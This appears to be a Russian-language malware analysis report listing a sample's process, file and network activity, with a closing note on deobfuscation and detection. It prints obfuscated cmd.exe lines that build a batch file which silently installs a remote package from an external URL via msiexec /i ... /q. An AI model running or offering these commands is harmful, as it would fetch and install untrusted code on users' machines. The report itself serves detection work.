Техническая информация
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.eom-nv.com^/gift.php ">>%temp%\alpac...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\alpaca.bat
- %TEMP%\1176528.cvr
- 'eo##nv.com':80
- 'eo##nv.com':443
- http://www.eo##nv.com/gift.php
- 'eo##nv.com':443
- DNS ASK eo##nv.com
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.eom-nv.com^/gift.php ">>%temp%\alpac...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^www^.eom-nv.com^/gift.php " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\alpaca.bat"
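- '<SYSTEM32>\msiexec.exe' /ihttp://www.eo##nv.com/gift.php /q
Примечание: фрагменты, которые команды с `set /p=` выше по частям дописывают в %TEMP%\alpaca.bat, складываются именно в эту команду — тихую (/q) установку пакета по URL через msiexec.exe; символы ^ и смешанный регистр в них служат только для обфускации. Для обнаружения показательны запуск msiexec.exe с ключом /i и HTTP-адресом, а также цепочка процессов cmd.exe, дописывающих .bat-файл в %TEMP%.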